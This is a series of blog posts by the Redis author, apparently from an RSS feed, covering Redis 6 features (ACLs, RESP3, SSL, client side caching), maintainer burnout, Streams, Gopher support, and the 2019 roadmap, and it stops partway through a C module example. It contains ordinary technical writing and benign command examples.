Redis 6 is the biggest release of Redis *ever*, so even if it is stable, handle it with care: test it for your workload before putting it in production. We have not seen big issues so far, but make sure to be careful. As we collect bug reports, we will prepare to release Redis 6.0.1 ASAP.

A big thank you to the many people that wrote code with me in this release, and to all the companies that sponsored both my work (thanks Redis Labs) and the work of the other contributors (thanks other companies). Also a big thank you to the many that reported bugs with care, sometimes following the boring process of retrying after we made some changes, or that suggested improvements of any kind.

As usual you can find Redis 6 in different places: at https://redis.io as a tarball, and in the GitHub repository tagged as “6.0.0”.

Enjoy Redis 6,
antirez Comments]]>
http://antirez.com/news/132
Redis 6 RC1 is out today http://antirez.com/news/131 http://antirez.com/news/131 Thu, 19 Dec 2019 16:27:00 +0000
But what’s interesting is that even additions may be done in very opinionated ways. Redis ACLs hardly resemble something you saw in other systems, and SSL support was written in a few iterations in order to finally pick the soundest idea from the point of view of keeping the core as clean as possible. I’m quite happy with the result.

Redis 6 does not bring just ACLs and SSL, it is the largest release of Redis ever as far as I can tell, and the one where the biggest number of people participated. So, let’s start with credits. Who made Redis 6? This is the list of contributors by commits (it’s a terrible metric, but the one I can easily generate), with at least two commits, and excluding merge commits. Also note that the number of commits in my case may be inflated a lot by the fact that I constantly fix many small things here and there.

685 antirez
81 zhaozhao.zz
76 Oran Agra
51 artix
28 Madelyn Olson
27 Yossi Gottlieb
15 David Carlier
14 Guy Benoish
14 Guy Korland
13 Itamar Haber
9 Angus Pearson
8 WuYunlong
8 yongman
7 vattezhang
7 Chris Lamb
5 Dvir Volk
5 meir@redislabs.com
5 chendianqiang
5 John Sully
4 dejun.xdj
4 Daniel Dai
4 Johannes Truschnigg
4 swilly22
3 Bruce Merry
3 filipecosta90
3 youjiali1995
2 James Rouzier
2 Andrey Bugaevskiy
2 Brad Solomon
2 Hamid Alaei
2 Michael Chaten
2 Steve Webster
2 Wander Hillen
2 Weiliang Li
2 Yuan Zhou
2 charsyam
2 hujie
2 jem
2 shenlongxing
2 valentino
2 zhudacai 00228490
2 喜欢兰花山丘

Thanks to all the above folks, it was great teamwork, ladies and gentlemen.
The list of new features in the change log is the following:

* Many new modules APIs.
* Better expire cycle.
* SSL
* ACLs
* RESP3
* Client side caching
* Threaded I/O
* Diskless replication on replicas
* Redis-benchmark cluster support + Redis-cli improvements
* Systemd support rewrite.
* Redis Cluster proxy was released with Redis 6 (but different repository).
* A Disque module was released with Redis 6 (but different repository).

Many big things, as you can see. I’ll spend a few words on selected ones.

RESP3
===

After ten years we needed a new protocol. I talked extensively about it here http://antirez.com/news/125, but then changed my mind, so the RESP3 protocol in Redis 6 is “opt in”. The connection starts in RESP2 mode, and only if you do a handshake using the new HELLO command do you enter the new protocol mode.
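So the upgrade is as simple as sending, on a fresh connection:

HELLO 3

The reply is a map of server properties (server version, protocol, client ID and so forth), and from that point on the connection speaks RESP3.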

Why a new protocol? Because the old one did not carry enough semantics. There are other features in RESP3, but the main idea was the ability to return complex data types from Redis directly, without the client having to know into what type to convert the flat arrays returned, or the numbers returned instead of proper boolean values, and so forth.

Since RESP3 is not the only protocol supported, I expect the adoption to be slow, but maybe this is not a bad thing after all: we’ll have time to adapt.

ACLs
===

The best introduction to Redis ACLs is the ACL documentation itself (https://redis.io/topics/acl), even if it probably needs some updates to match the last minute changes. So it’s more interesting to talk about motivations here. Redis needed ACLs because people need ACLs in bigger environments, in order to better control which client can do certain operations. But another main point about adding ACLs to Redis was isolation, in order to defend the data against application bugs. If your worker can only call BRPOPLPUSH, the chance that a new developer adds a FLUSHALL for debugging, which then ends up in production code by mistake and creates a five hour nightmare, is lower.
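As a sketch of the scenario above (user name, password and key pattern are of course made up), such a worker could be declared like this:

ACL SETUSER worker on >somepassword ~jobs:* +brpoplpush

A client authenticating as this user can call BRPOPLPUSH against keys matching jobs:*, and nothing else.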

ACLs in Redis are free, both operationally, because if you don’t use them you can avoid knowing they are supported at all, and from the point of view of performance, since the overhead is not measurable. I guess it’s a good deal to have them. Bonus point: we have a Redis modules interface for ACLs now, so you can write custom authentication methods.

SSL
===

It’s 2019, almost 2020, and there are new regulations. The only problem was doing it right. And doing it right required doing it wrong, understanding the limitations, and then abstracting the Redis connections in order to do it right. This work was entirely performed without my help, which shows how the Redis development process changed in recent times.

Client side caching
===

I blogged about it here http://antirez.com/news/130, however I think that right now this is the most immature feature of Redis 6. Yep, it’s cool that the server can assist you in caching client side values, but I want to improve this before Redis 6 GA is out. In particular, it could be very good to add a new mode that requires the server to maintain no state about clients, or very little state at all, and trade this for more messages. Moreover, right now the messages to expire certain “cache slots” can’t be coalesced into a single one. There is more work to do in January about this feature, but it will be a good one.

Disque as a module
===

Finally I did it :-) https://github.com/antirez/disque-module, and I’m very happy with the result.
Disque as a module really shows how powerful the Redis module system is at this point. Cluster message bus APIs, the ability to block and resume clients, timers, AOF and RDB control of module private data. If you don’t know what Disque is, check the repository: the README is quite extensive.

Cluster Proxy
===

My colleague Fabio worked for months on this Redis Cluster proxy: https://github.com/artix75/redis-cluster-proxy.
I have wanted to see this happen for ages: the client landscape is very fragmented when it comes to Redis Cluster support, so now we have a (work in progress) proxy that can do many interesting things. The main one is to abstract the Redis Cluster for clients, as if they were talking to a single instance. Another one is to perform multiplexing, at least when it is simple and clients just use simple commands and features. When blocking or transactions are involved, the proxy allocates a different set of connections for the client. The proxy is also completely threaded, so it can be a good way to maximize CPU usage in case most of your CPU time is spent on I/O. Check the project README for status and give it a try!

Modules
===

With Redis 6 the modules API is totally at a new level. This is one of the parts of Redis that matured fastest in our history, because Redis Labs used the modules system from day zero in order to develop very complex stuff, not just trivial examples. Some time ago I started the Disque port, and this also motivated me to bring new features to the modules system. The result is that Redis is really a framework for writing systems as modules, without having to invent everything from scratch; and being BSD licensed, Redis is really an open platform to write systems.

Internals
===

There are tons of improvements to the Redis internals: the way commands are replicated changed quite a bit, and the expires now use a different algorithm which is faster and more cache friendly.

Status and ETA
===

Today we went RC1, and I hope that between the end of March and, at worst, May, you’ll see the GA ready.
Right now Redis 6 is definitely testable and the chance you run into a bug is very small. Yet it includes a ton of code changes, and the new features are composed of new code that nobody ran in production before. So if you find bad things, please report them in the issue system, describing what happened as best you can.

Thanks to everybody who made this release possible and who will work in the next months to bring it to a very stable state.

Oh, I almost forgot! This is the LOLWUT command interactive art for version 6:

[image: http://antirez.com/misc/lolwut6.png]

Every run displays a different landscape that is randomly generated. Comments]]>
http://antirez.com/news/131
Client side caching in Redis 6 http://antirez.com/news/130 http://antirez.com/news/130 Thu, 04 Jul 2019 17:10:34 +0000
The New York Redis day was over. I got up at the hotel at 5:30, still pretty much in sync with the Italian time zone, and immediately went walking on the streets of Manhattan, completely in love with the landscape and the wonderful feeling of being just a number among millions of other numbers. Yet I was thinking about the Redis 6 release with the feeling that what was probably the most important feature of all, the new version of the Redis protocol (RESP3), was going to have a very slow adoption curve, and for good reasons: wise people avoid switching tools without very good reasons. After all, why did I want to improve the protocol so badly? For two reasons mainly: to provide clients with more semantically rich replies, and to open the way to new features that were hard to implement with the old protocol; one feature in particular was the most important to me: client side caching.

Rewind back to about one year ago. I arrived at Redis Conf 2018, in San Francisco, with the firm idea that client side caching was the most important thing in the future of Redis. If we need fast stores and fast caches, then we need to store a subset of the information inside the client. It is a natural extension of the idea of serving data with small delays and at a big scale. Actually almost every very large company already does it, because eventually it is the only way to survive the load. Yet Redis had no way to assist the client in such a process. By a fortunate coincidence, Ben Malec gave a talk at Redis Conf exactly about client side caching [1], using just the tools that Redis provides and a number of very clever ideas.

[1] https://www.youtube.com/watch?v=kliQLwSikO4

The approach taken by Ben really opened my imagination. There were two key ideas Ben used in order to make his design work. The first was to use the Redis Cluster idea of “hash slots” in order to divide keys into 16k groups. That way clients would not need to track the validity of each key, but could use a single metadata entry for a group of keys. Ben used Pub/Sub in order to send the notifications when keys were changed, so he needed some help from the application in all its parts; however, the scheme was very solid. Modify a key? Also publish a message invalidating it. On the client side, are you caching keys? Remember the timestamp at which you cache each key, and also, when receiving invalidation messages, remember the invalidation time for each slot. When using a given cached key, do a lazy eviction, by checking if the key you cached has a timestamp which is older than the timestamp of the invalidation received for the slot this key belongs to: in that case the key is stale data, and you have to ask the server again.

After watching the talk, I realized that this was a great idea to be used inside the server, in order to allow Redis to do part of the work for the client, and make client side caching simpler and more effective, so I returned home and wrote a document describing my design [2].

[2] https://groups.google.com/d/msg/redis-db/xfcnYkbutDw/kTwCozpBBwAJ

But to make my design work I had to focus on switching the Redis protocol to something better, so I started writing the specification and later the code for RESP3, and the other Redis 6 things like ACLs and so forth, and client side caching joined the huge room of the many ideas for Redis that I abandoned in some way or another for lack of time.

Yet I was among the streets of New York thinking about this idea. Later I went to lunch and a coffee break with friends from the conference. When I returned to my hotel room I had all the evening left, and most of the next day before the flight, so I started writing the implementation of client side caching for Redis 6, closely following the proposal I wrote to the group one year ago: it still looked great.

Redis server-assisted client side caching, finally called “tracking” (but I may change my mind), is a very simple feature composed of just a few key ideas.

The key space is split into “caching slots”, but they are a lot more than the hash slots used by Ben. We use 24 bits of the output of CRC64, so there are a bit more than 16 million different slots. Why so many? Because I think you want to be able to have a server with 100 million keys, and yet an invalidation message should not affect more than a few keys in the client side cache. The memory overhead inside Redis to hold the invalidation table is 130 megabytes: an array of 8-byte pointers with 16M entries. That’s OK with me: if you want the feature, you are going to make great use of all the memory you have in the clients, so using 130MB server side is fine; what you win is much more fine-grained invalidation.

Clients enable the feature in an “opt in” way, with a simple command:

CLIENT TRACKING on

The server replies with the good old +OK, and starting from that moment, every command that is flagged as “read only” in the command table will not just return the keys to the caller: as a side effect, it will also remember the caching slots of all the keys the client requested so far (but only the ones requested with a read only command, that’s the agreement between the server and the client). The way Redis stores this information is simple. Each Redis client has a unique ID, so if client ID 123 performs an MGET about keys hashing to slots 1, 2, and 5, we’ll have the Invalidation Table with the following entries:

1 -> [123]
2 -> [123]
5 -> [123]

But later client ID 444 also asks about keys in slot 5, so the table will be like:

5 -> [123, 444]

Now some other client changes some key in slot 5. What happens is that Redis will check the Invalidation Table, to find that both clients 123 and 444 may have cached keys of that slot. We’ll send an invalidation message to both clients, and they will be free to deal with it in any form: either remember, with a timestamp, the last time the slot was invalidated, and later check in a lazy way the timestamp (or incremental “epoch” if you like it more: it is safer) of the cached object, and evict it based on the comparison; or the client can reclaim the objects directly, by keeping a table of what it cached about this specific slot. This approach with a 24 bit hash function is not an issue, because we’ll not have a very long list at all, even when caching tens of millions of keys. After sending the invalidation messages, we can remove the entries from the invalidation table; this way we’ll no longer send invalidation messages to those clients until they read keys for that slot again.
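To make the lazy approach more concrete, here is a minimal sketch of the client side logic in Python. Note that crc64() and ask_redis() are hypothetical helpers assumed to be provided elsewhere, and the mask matches the 24 bits of caching slots described above:

import time

SLOT_MASK = 0xFFFFFF        # 24 bits of the CRC64 output.
cache = {}                  # key -> (cached_at, value)
invalidated_at = {}         # slot -> time of the last invalidation.

def slot_of(key):
    return crc64(key) & SLOT_MASK       # crc64() assumed available.

def on_invalidation(slot):
    # Called for every invalidation push message received.
    invalidated_at[slot] = time.monotonic()

def cached_get(key):
    if key in cache:
        cached_at, value = cache[key]
        # Lazy eviction: the copy is valid only if its slot was not
        # invalidated after the moment we cached the key.
        if invalidated_at.get(slot_of(key), 0) < cached_at:
            return value
        del cache[key]
    value = ask_redis(key)              # A normal GET, assumed elsewhere.
    cache[key] = (time.monotonic(), value)
    return value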

Note that clients are not forced to really use all the 24 bits of the hash function. They may just use, for instance, 20 bits, and then also shift the slots of the invalidation messages that Redis sends them. Not sure if there are many good reasons to do that, but in memory constrained systems it may be an idea.

If you followed closely what I said, you are thinking that the same connection receives both the normal client replies and the invalidation messages. This is possible with RESP3, because invalidations are sent as “push” message types. Yet if the client is a blocking one, and not an event driven client, this starts to be complex: the application needs some way to read new data from time to time, and that looks complex and fragile. It is perhaps, in that case, much better to use another application thread, and a different client connection, in order to receive the invalidation messages. So you are allowed to do the following:

CLIENT TRACKING on REDIRECT 1234

Basically we can say: for all the keys we get with the current connection, we want the invalidation messages to be sent to client 1234 instead. Multiple clients may ask to have their invalidation messages redirected to a single client, for instance in the case of connection pools. All you need to do is to create this special connection to receive the invalidation messages, call CLIENT ID to know which ID this client connection has, and later enable tracking.
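Putting the steps together, the dance looks like this (the ID is obviously just an example). On the connection dedicated to invalidation messages:

CLIENT ID
:1234

And on each data connection:

CLIENT TRACKING on REDIRECT 1234
+OK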

There is one problem left: what happens if we lose the connection with the server on the invalidation link? We may run into trouble since invalidation messages will no longer be received. Normally the application will detect that the link is severed, and will reconnect, flushing the current cache (or taking softer resolutions, like putting all the timestamps for the slots a few seconds in the future, to have some time to populate the cache while serving data that may be a few seconds stale). Yet it may be a better idea if the invalidation thread pings the connection from time to time to make sure it is alive. However, in order to reduce the risk of stale data, Redis will also start to inform the clients that redirected their invalidation messages to some other client that is now disconnected about the situation, just using special push messages: at the next query performed, the client will know.

What I described was just merged into Redis unstable. Probably it’s not the final word, but we have more months before the first Redis 6 release candidate; there is time to change everything: just send me your feedback. I’m also looking at ways to enable the feature for RESP2. That would work only when redirection is enabled, and the client listening for messages should probably go into Pub/Sub mode so that we could send a kind of Pub/Sub message. In this way old clients can be fully reused.

I hope this was enough to stimulate your appetite: if we execute this inside Redis very well, and then document it for the client authors to know how to provide support, data may go a lot nearer to the application than ever, even in applications run by small teams that so far avoided trying to implement client side caching. For large teams and very large applications doing this already, the overhead could be reduced, together with the complexity of the implementation. Comments]]>
http://antirez.com/news/130
The struggles of an open source maintainer http://antirez.com/news/129 http://antirez.com/news/129 Thu, 16 May 2019 17:42:18 +0000
Flood effect

I don’t believe in acting fast, thinking fast, winning the competition on time and stuff like that. I don’t like the world of constant lack of focus we live in, because of social networks, chats, emails, and a schedule full of activities. So when I used to receive an email about Redis back in the early times of the project, when I still had plenty of time, I was able to focus on what the author of the message was trying to tell me. Then I could recall the relevant part of Redis we were discussing, and finally reply with my real thoughts, after considering the matter with care. I believe this is how most people should work regardless of what their job is.

When a software project reaches the popularity Redis reached, and at the same time once the communications between individuals are made so simple by the new social tools, and by your attitude of being “there” for users, the amount of messages, issues, pull requests, and suggestions the authors receive will grow exponentially. At the same time, at least in the case of Redis, but I believe this to be a common problem, the number of very qualified people that can look at such inputs from the community grows very slowly. This creates an obvious congestion. Most people try to address it in the wrong way: using pragmatism. Let’s close the issue after two weeks of no original poster replies, after we ask some questions. Close all the issues that are not very well specified. And other “inbox zero” solutions. The reality is that to process community feedback very well you have to take the time needed, otherwise you will just pretend your project has a small number of open issues. Having a lot of resources to hire core-level experts for each Redis subsystem, to work on OSS full time, would work, but is not feasible.

So what happens? You start to prioritize more and more what to look at and what not. And you feel like a piece of shit for ignoring so many things and people, and the contributors believe you don’t care about what others have to give you. It’s a complex situation. Usually the end result is to develop an attitude of mostly addressing critical issues and disregarding all the new stuff, since the new stuff is not yet in the core, and who wants a larger code base with even more PRs and issues there? Maybe also written in a more convoluted way compared to your usual programming style, so: more complexity, and good luck tracking the root cause when there is a critical bug in there.

Role shifting

As a result of the “flood effect” problem exposed above, you suddenly also change job. Redis became popular because I supposedly am able to design and write software. And now instead most of the work I do is to look at issues and pull requests, and I also feel that I could do many of the contributions I receive better myself. Some will be of better quality than I could achieve, because there are also better programmers than me contributing to Redis, but *most*, by the nature of big numbers, will be average contributions, written just to solve a given problem that was contingent for the folks who submitted them. While, when I design for Redis, I tend to think of Redis as a whole, because I have been writing this thing for years. So what you were good at, you no longer have time to do. This in turn means fewer organic big new features. My solution to that? Sometimes I just stop looking at issues and PRs for weeks, because I’m coding or designing: that is the work I really love and enjoy. However this in turn creates way more pressure on me, psychologically. To do what I love and can do well, I have to feel like shit.

Time

There are two problems related to working on the same project for a prolonged amount of time, at least for me.
First, before the Redis experience I *never* worked every week day of my life. I could work one week, stop for two, then work one month, then disappear for another two months. Always. People need to recharge, to get new energy and ideas, to do creative work. And programming at a high level is a fucking creative job. Redis itself was created like that for the first two years, that is, when the project evolved at the fastest speed. Because the sum of the productivity of me working just when I want is greater than the productivity I have when I’m forced to work every day in a steady way.

However, my work ethic allowed me to have a very discontinuous schedule only when I was working alone with my companies. Once I started to receive money to work on Redis, it was no longer possible for my ethic to keep my past pattern, so I started to force myself to work on a normal schedule. This has been a huge struggle for me, for many years at this point. Moreover I’m sure I’m doing less than I could because of that, but this is how things work. I could tell Redis Labs that I want to return to my old schedule, but that would not work because at this point I really “report” to the community, not to the company.

Another problem is that working a lot on the same project is also a complex matter, mentally speaking. I used to change project every six months in the past. Now for ten years I did the same thing. In that regard I tried to save my sanity by having sub-projects inside Redis. One time I did Cluster, another time disk storage (now abandoned), another was HyperLogLogs, and so forth. Basically things that bring value to the project but that, in isolation, are other stuff. But eventually you have to return back to the issues and PRs page and address the same things every day. “Replica is disconnecting because of a timeout” or whatever. Let’s investigate that again.

Fear

I always had some fear of losing the technological leadership of the project. Not because I think I’m not good enough at designing and evolving Redis, but because I know my ways are not aligned with: 1) what a sizable amount of users want. 2) what most people in IT believe software is. So I had to constantly balance between what I believe to be good design, set of features, speed of development (slow), size of the project (minimal), and what I was expected to deliver by most of the user base. Fortunately there is a percentage of Redis users that understands the Redis way perfectly, so at least from time to time I get some words of comfort.

Frictions

Certain people are total assholes. They are everywhere, it is natural, and if you ask me, I even believe that in programming there are a lot more nice people than in other fields. But still you’ll always see a percentage of total jerks. As the leader of a popular OSS project, in one way or another you’ll have to deal with these people, and that’s maybe one of the most stressful things I ever did in the course of Redis development.

Futileness

Sometimes I believe that software, while great, will never be huge like writing a book that will survive for centuries. Not because it is not as great per se, but because, as a side effect, it is also useful… and will be replaced when something more useful is around. I would like to have time to do other activities as well. So sometimes I believe all I’m doing is, in the end, futile. We’ll design and write systems, and new systems will emerge; but will anyone who just stays in software, instead of staying in the big ideas of software, ever set a new mark? From time to time I think I potentially had the ability to work on big ideas, but because I focused on writing software instead of thinking about software, I was not able to use my potential in that regard. This is basically the contrary of the impostor syndrome, so I guess I have a big idea of myself: sorry for that, I should be more humble.

That said, I was able to work for many years doing things I really loved, that gave me friends, recognition, money, so I don’t want to say it was a bad deal. Yet I totally understand people struggling a lot to stay afloat once their projects start to be popular. This blog post is dedicated to them. Comments]]>
http://antirez.com/news/129
Redis streams as a pure data structure http://antirez.com/news/128 http://antirez.com/news/128 Fri, 22 Mar 2019 15:10:15 +0000
## Streams are CSV files on steroids

If you want to log a series of structured data items and decided that databases are overrated after all, you may say something like: let’s just open a file in append only mode, and log every row as a CSV (Comma Separated Value) item:

(open data.csv in append only)
time=1553096724033,cpu_temp=23.4,load=2.3
time=1553096725029,cpu_temp=23.2,load=2.1

Looks simple, and people did this for ages and still do: it’s a solid pattern if you know what you are doing. But what is the in-memory equivalent of that? Memory is more powerful than an append only file and can automagically remove the limitations of a CSV file like the following ones:

1. It’s hard (inefficient) to do range queries here.

2. There is too much redundant information: the time is almost the same in every entry and the fields are duplicated. At the same time, removing it would make the format less flexible, if I want to switch to a different set of fields.

3. Item offsets are just the byte offset in the file: if we change the file structure the offsets will be wrong, so there is no actual true concept of primary ID here. Entries basically cannot be univocally addressed in any way.

4. I can’t remove entries, but only mark them as no longer valid, without the ability to garbage collect, other than by rewriting the log. Log rewriting usually sucks for several reasons and if it can be avoided, it’s good.

Still, such a log of CSV entries is also great in some ways: there is no fixed structure, fields may change, it is trivial to generate, and after all it is quite compact as well. The idea with Redis Streams was to retain the good things, but go beyond the limitations. The result is a hybrid data structure very similar to Redis Sorted Sets: they *feel like* a fundamental data structure, but to get such an effect, internally they use multiple representations.

## Streams 101 (you may skip this if you already know Redis Stream basics)

Redis Streams are represented as delta-compressed macro nodes that are linked together by a radix tree. The effect is to be able to seek to random entries in a very fast way, to obtain ranges if needed, remove old items to create a capped stream, and so forth. Yet our interface to the programmer is very similar to a CSV file:

> XADD mystream * cpu-temp 23.4 load 2.3
"1553097561402-0"
> XADD mystream * cpu-temp 23.2 load 2.1
"1553097568315-0"

As you can see from the example above, the XADD command auto-generates and returns the entry ID, which is monotonically incrementing and has two parts: a Unix time in milliseconds and a sequence number, in the form <ms-time>-<seq>, where the sequence number distinguishes entries added in the same millisecond.
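It is exactly thanks to such IDs that entries are univocally addressable and range queries are cheap, fixing two of the CSV limitations above. For instance, with the two entries just added:

> XRANGE mystream - +
1) 1) "1553097561402-0"
   2) 1) "cpu-temp"
      2) "23.4"
      3) "load"
      4) "2.3"
2) 1) "1553097568315-0"
   2) 1) "cpu-temp"
      2) "23.2"
      3) "load"
      4) "2.1"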
http://antirez.com/news/128
Gopher: a present for Redis http://antirez.com/news/127 http://antirez.com/news/127 Mon, 25 Feb 2019 17:17:23 +0000
[… here Redis tries to stop the tears, but the emotion is too strong and there are bits (I mean zeros and ones) on the floor …]

WTF are you saying?! should be your automatic question. Gopher in 2019 sounds a bit strange. However it is not *just* a joke, even if it is largely a joke. The implementation is just 100 lines of code after all, excluding the external tool to render the pages into Redis keys. But… the thing is that there is really an active community around Gopher, a very small one, but one that has been growing in recent years and months. There are people that feel that the internet is no longer what it used to be. There is too much control, companies tracking, comments, likes, retweets, to the point that the content is no longer king. One writes new things only for them to be popular for 5 hours and then disappear. There is no longer a discussion that can survive more than a few minutes without becoming some kind of flame, unless all the parties self-censor every possible feeling, uneasy word, and belief, to the point of making the discussion quite useless. Finally, loading a stupid page with 1k of text requires loading 50 JavaScript files, watching the screen flicker since client-side rendering is cool, and so forth.

On the other hand Gopher is a text only protocol that is great to deliver text only documents where the stress is on what you write. But that would be fetishism; for me the silver bullet of Gopher is that it is UNCOOL. Uncool enough that it will be forever, AFAIK, an alternative reality where certain folks can decide to separate from the rest, to experience a different way to do things, more similar to the old times of BBSs or the first years of the internet. A place where most people will not want to go just to read nerdy stuff in an 80-column fixed-size font.

What you do in Gopher is create your Gopher hole, that is, your space inside the Gopher universe, basically like your web site on the internet. There was no shortage of tools to do that already, but Redis is quite nice for a few reasons: you can change the Redis keys to change the site content in real time, which is handy. You can use replication in order to duplicate a site, and you can even just save your RDB file to have an exact copy of the whole Gopher hole to archive for backup or historical reasons.

This Redis Gopher concept was created in collaboration with Freaknet, a historical hacking laboratory here in Catania: https://it.wikipedia.org/wiki/FreakNet.
Those folks do a lot of interesting stuff, including a retrocomputing hardware museum project in Palazzolo Acreide: https://museo.freaknet.org/en/.

How does it work?

Well, it's trivial: I hijacked the inline protocol, and specifically two kinds of inline requests that were illegal anyway: an empty request, or any request that starts with "/" (there are no Redis commands starting with a slash). Normal RESP2/RESP3 requests are completely out of the path of the Gopher protocol implementation and are served as usual. If you open a connection to Redis when Gopher is enabled and send it a string like "/foo", and there is a key named "/foo", it is served via the Gopher protocol. The whole implementation is 100 lines of code. Initially I thought about using data structures with semantic transformations to Gopher types, but that's just complex and useless.

Instead, what I did was to provide an authoring tool for Gopher over Redis; you can find it here:

https://github.com/antirez/gopher2redis

To see an example Gopher hole running on a Redis instance, just go to gopher://gopher.antirez.com; by the way, that will be the address of my Gopher hole once I build one in the coming days. P.S. I suggest using the Lynx text-only web/gopher browser to access Gopher.
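
As a quick way to see the protocol trick described above in practice, assuming a local instance with Gopher support enabled and a key named "/foo": inline requests are just lines terminated by a newline, so even nc can act as a rudimentary Gopher client (a sketch, not a full Gopher setup):

$ printf '/foo\r\n' | nc localhost 6379

The same port keeps speaking RESP as usual: the Gopher code path is entered only for those two otherwise-illegal inline requests.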

Gopher support is disabled by default. To enable it, use the Redis unstable branch and set the “gopher-enabled” option to yes. However, MAKE SURE to also password protect Redis: the Gopher protocol will still serve content, but normal Redis commands will not be accessible. This way (and assuming you don't have data other than your Gopher keys to expose in the instance) you could make the instance public, as a true Gopher server.
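
In redis.conf terms, the setup described above boils down to something like the following sketch (the password is just a placeholder for the example):

gopher-enabled yes
requirepass put-a-very-long-password-here

With the password set, unauthenticated connections can only perform the Gopher-style inline requests, while the real command set remains protected.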

Well, have fun with Gopher! I hope this Gopher thing will go forward; I really believe there are a few of us that need to create a community outside the chaos of the modern Internet. Not that it will be possible to have no interactions at all: for instance, I have no plans to stop blogging or using the Internet. But certain slower, higher quality communications need a place to prosper.
An update about Redis developments in 2019 http://antirez.com/news/126 Wed, 20 Feb 2019 12:14:11 +0000
— https://news.ycombinator.com/item?id=19204436 —
I love Redis, but I'm a bit skeptical of some of the changes that are currently in development. The respv3 protocol has some features that, while they sound neat, also could significantly complicate client library code. There's also a lot of work going into a granular acl. I can't imagine why this would be necessary, or a higher priority than other changes like multi-thread support, better persistence model, data-types, etc.
— end of user comment —

I have the feeling she/he (not sure) is not the only one who looks at ACLs as some sort of feature imposed by Redis Labs' goals, because of “enterprise users” or something like that. The other points in the comment are also interesting, and I believe all of them are well worth addressing in order to communicate clearly with the Redis community about the road ahead.

For simplicity I’ll split this blog post into sections addressing every single feature mentioned in the original comment.

## RESP3

The goal of RESP3, as I already blogged in these pages, is to actually simplify the clients landscape. Hopefully every client will have a lower layer that does not try to reinvent some kind of higher level interface: redis.call("get","foo"). There is no longer a need to orchestrate conversions, because now the protocol is semantic enough to tell the client what a given reply should look like in the hands of the caller, nor any need to know beforehand the command fingerprint for the majority of commands. What I think the user is referring to is RESP3 support for out of band communications, that is, the reply "attributes".

I really believe that in the future of Redis, "client side caching" will be a big thing. It's the logical step in every scalable system. However, without server assistance, client side cache invalidation is a nightmare. This is mainly why RESP3 supports attributes in replies. However, Redis 6 probably *will not implement any of that*. Redis unstable, which will become Redis 6, already has a RESP3 implementation that is almost complete, and there are no attributes. Clients implementing RESP3 can just decide to discard attributes if they are willing to be really future-proof, and likely attributes will not be sent at all anyway, even in future Redis versions, unless the user activates some kind of special feature: for instance, for client side caching, the connection will have to be put in a special mode. Moreover, as you know, Redis 6 will be completely backward compatible with RESP2. Actually, I'm starting to believe that RESP2 support will never be removed, because it is almost free to keep, and there is no good reason to break backward compatibility once we have made the effort to implement the abstraction layer between RESP2 and RESP3.

Normally I don't like to change things without a good reason; however, RESP2 limitations were having a strong effect on the client ecosystem. I would like to have a client landscape where users, going from one client to another, will feel at home, and where the API is the Redis API, not the layer that the client author invented. I'm not against a *higher level* API in addition to the lower level one, btw, but there should be a common ground, and clients should be able to send commands without knowing anything about such commands.

## ACLs

The ACL specification was drafted by myself four years ago. I waited that long in order to convince myself it was really time to implement it: we went a long way without any ACLs, using just tricks, mainly command renaming. However, don't believe that the main motivation for ACLs is enterprise customers in need of security. As a side effect, ACLs also allow authentication of users for security purposes, but the main goal of the feature is *operational*.

Let me show you an example. You have a Redis instance and you plan to use it for a new thing: delayed jobs processing. You get a library from the internet, and it looks to work well. Now, why on earth should such a library, which you don't know line by line, be able to call FLUSHALL and flush away your database instantly? Maybe the library's test suite has such a command inside, and you realize it when it's too late. Or maybe you just hired a junior developer who keeps calling "KEYS *" on the Redis instance, while your company's Redis policy is "no KEYS command".

Another scenario: cloud providers. They need to carefully rename the admin commands, and even mask such commands from being leaked in some way; more tricks, so that MONITOR will not show those commands in its output, for instance. With ACLs you can set up Redis so that default users, without special authentication, are prevented from running anything administrative or dangerous. I think this will be a big improvement for operations.
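
To make the scenario concrete, here is a sketch of what such a rule could look like with the ACL commands in the unstable branch (user name, password and key pattern are invented for the example; check the ACL documentation for the exact syntax):

> ACL SETUSER jobworker on >somepassword ~jobs:* +@read +@write -keys -flushall
OK

A client authenticated as "jobworker" can only touch keys matching "jobs:*", and its calls to KEYS or FLUSHALL fail no matter what the library it uses tries to do.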

Moreover, the ACL implementation is some of the best code I wrote for Redis, AFAIK. There is nearly no CPU cost at all, unless you use key patterns, and even then it's small. The implementation is completely self-contained inside the acl.c file; the rest of the core has a handful of calls to the ACL API. No complexity is added to the system because it is completely modular. Actually, the ACL code allowed some good refactoring around the AUTH command.

## Multi threading

There are two possible kinds of multi threading support that Redis could get. I believe the user is referring to "memcached-alike" multithreading, that is, the ability to scale a single Redis instance across multiple threads in order to increase the operations per second it can deliver for things like GET or SET and other simple commands. This involves making the I/O, command parsing and so forth multi threaded. So let's call this thing "I/O threading".

Another multi threaded approach is to, instead, allow slow commands to be executed in a different thread, so that other clients are not blocked. We’ll call this threading model “Slow commands threading”.

Well, here is the plan: I/O threading is not going to happen in Redis AFAIK, because after much consideration I think it's a lot of complexity without a good reason. Many Redis setups are actually network or memory bound. Additionally, I really believe in a share-nothing setup, so the way I want to scale Redis is by improving the support for running multiple Redis instances on the same host, especially via Redis Cluster. Two things will happen in 2019 on that front:

A) Multiple Redis Cluster instances will be able to orchestrate in order to make judicious use of the local disk, that is, avoiding things like two simultaneous AOF rewrites.

B) We are going to ship a Redis Cluster proxy as part of the Redis project, so that users are able to abstract away a cluster even without a good implementation of the Cluster protocol on the client side.

Another thing to note is that Redis is not memcached but, like memcached, is an in-memory system. Making an in-memory system with a very simple data model like memcached multithreaded makes a lot of sense, and for an on-disk store multi-threading is mandatory. A multi-threaded complex in-memory system sits in the middle, where things become ugly: Redis clients are not isolated, and data structures are complex. A thread doing LPUSH needs to serve other threads doing LPOP. There is less to gain, and a lot of complexity to add.

What I instead *really want* is slow operations threading, and with the Redis modules system we are already going in the right direction. However, in the future (not sure if in Redis 6 or 7) we'll get key-level locking in the module system, so that threads can completely acquire control of a key to process slow operations. Right now modules can implement commands and create a reply for the client in a completely separate thread, but to access the shared dataset a global lock is still needed: this will go away.
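
To show that this is not science fiction, here is a minimal sketch of a module command doing its slow work in a thread with the blocking-clients API that already exists today (module and command names are invented, and the signatures are abbreviated from memory, so check the modules documentation for the exact prototypes):

#define REDISMODULE_EXPERIMENTAL_API
#include "redismodule.h"
#include <pthread.h>
#include <unistd.h>

/* Reply callback: runs in the main thread once the worker is done. */
int Slow_Reply(RedisModuleCtx *ctx, RedisModuleString **argv, int argc) {
    REDISMODULE_NOT_USED(argv);
    REDISMODULE_NOT_USED(argc);
    long long *res = RedisModule_GetBlockedClientPrivateData(ctx);
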